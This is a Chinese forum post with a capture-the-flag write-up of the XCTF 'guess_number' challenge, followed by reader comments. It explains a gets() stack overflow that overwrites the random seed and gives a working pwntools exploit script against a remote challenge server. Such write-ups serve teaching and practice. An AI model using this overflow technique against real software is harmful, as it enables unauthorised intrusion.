XCTF攻防世界guess_number
guess_number题解首先进行程序基本信息检查:
看起来是正常程序,大概就是输入一个name,然后输入一个数字,相匹配就成功。(初步猜测是随机数233333)
ida查看一下源代码:
很幸运,程序没有进行混淆或者反调,直接看到了真实的源代码。在main函数里,我们注意到有一个gets()函数,这是一个危险函数,很可能会出问题。
继续往下看,下面的for循环是处理输入的数字部分,果然是一个随机数字,猜对了。在这里,有一个if判断,我们是否可以进行覆盖使判断条件成立直接执行到success?不能,因为程序开启了cannary,没办法进行覆盖。
最后在输入正确的数字后会执行一个sub_c3e()函数,进入函数查看:
直接执行了"cat flag"。
总结一下,我们就是要输入正确的随机数,然后让程序执行到sub_c3e()函数,就可以看到flag了。那么如何猜对随机数字呢?
需要注意在产生随机数的前面有个gets()函数,而且没有对输入的字符长度进行限制。来看一下栈中的情况:
我们可以通过var_30对seed进行覆盖,这样一来生成的随机数就变成我们已知的了。
具体实现:
1. 通过垃圾字符覆盖var_30到seed:“a” * 0x20
2. 使用p64()把1按照64位的方式进行排列产生随机数
3. 调用srand()生成随机数
4. 利用循环多次输入进行比较,直到相等。
exp:
from pwn import *
from ctypes import *
sh = remote('111.198.29.45',43114)
e=ELF('./guess_number')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
payload = 'A' * 0x20 + p64(1)
sh.sendlineafter("name:",payload)
libc.srand(1)
for i in range(10):
sh.sendlineafter("number:",str(libc.rand()%6+1))
print sh.recvall()
最终获取到flag:
本帖最后由 闲月疏云 于 2019-10-2 19:39 编辑
yaoyao7 发表于 2019-10-2 19:12
原本的意思是通过一些覆盖强行使条件成立,不一定就是覆盖.text区段。是我没表达清楚,抱歉
那这样的话有Canary应该也没什么影响吧……?Canary不保护局部变量本身不被覆盖吧(印象中是的,没打过pwn,错了请轻喷orz),没有NX保护能不能直接shellcode? 闲月疏云 发表于 2019-10-2 18:14
pwn感觉也都是脑洞题玩不来orz
不过“覆盖使判断条件成立直接执行到success”这个思路有点清奇啊,不知道 ...
原本的意思是通过一些覆盖强行使条件成立,不一定就是覆盖.text区段。是我没表达清楚,抱歉{:1_907:} 阿阿阿阿阿阿阿阿阿阿,好难学啊 有技术真好 支持一下 感谢楼主分享! python3 ctypes确实好用 看不懂。。支持一波吧 感谢楼主分享 cdevil 发表于 2019-10-1 23:02
python3 ctypes确实好用
是啊 感觉神器2333 pwn感觉也都是脑洞题玩不来orz
不过“覆盖使判断条件成立直接执行到success”这个思路有点清奇啊,不知道是不是我理解错了,难道要堆栈覆盖到.text吗……
页:
[1]
2